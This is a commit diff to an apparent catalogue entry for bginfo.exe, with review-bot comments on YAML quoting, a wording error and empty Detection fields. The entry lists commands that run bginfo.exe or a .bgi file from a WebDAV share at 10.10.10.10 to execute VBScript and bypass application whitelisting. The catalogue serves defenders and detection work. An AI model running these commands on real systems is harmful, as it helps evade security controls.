minor adjustments

Oddvar Moe
2018-09-25 02:33:38 +02:00
parent a2db5dca8c
commit 7961a99173
2 changed files with 227 additions and 17 deletions


@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: AWL Bypass
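Review bot: the replacement Command line drops both the YAML single quotes and the inner double quotes around \\10.10.10.10\webdav\bginfo.exe, leaving a plain scalar. Backslashes are literal in a plain scalar, so this value still parses, but a plain scalar stops parsing as intended once a command contains ": " or " #". Keeping every Command value single-quoted would be the safer uniform style; if the goal was only to remove the inner double quotes, drop those and keep the outer quotes.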
@@ -20,7 +20,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: AWL Bypass
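Review bot: the Description context line in this entry reads "may not longer work due to patch". Since the Command line just above it is being edited anyway, correct it to "may no longer work" and state which patch is meant, so a reader can tell whether the entry still applies to the hosts they are assessing or defending.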
@@ -30,8 +30,10 @@ Commands:
OperatingSystem: Windows
Full Path:
- No fixed path
Code Sample: []
Detection: []
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Acknowledgement:
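Review bot: Code Sample and Detection change from an empty list ([]) to a list holding one mapping with no value ("- Code:", "- IOC:"), which YAML loads as a null field rather than as "nothing here". Any template or script that iterates these lists will now get one entry with a null value, so either keep [] until there is content or fill the fields in. For Detection, both commands in this file run bginfo.exe from a UNC/WebDAV path, which would be a reasonable IOC to record instead of leaving the field blank.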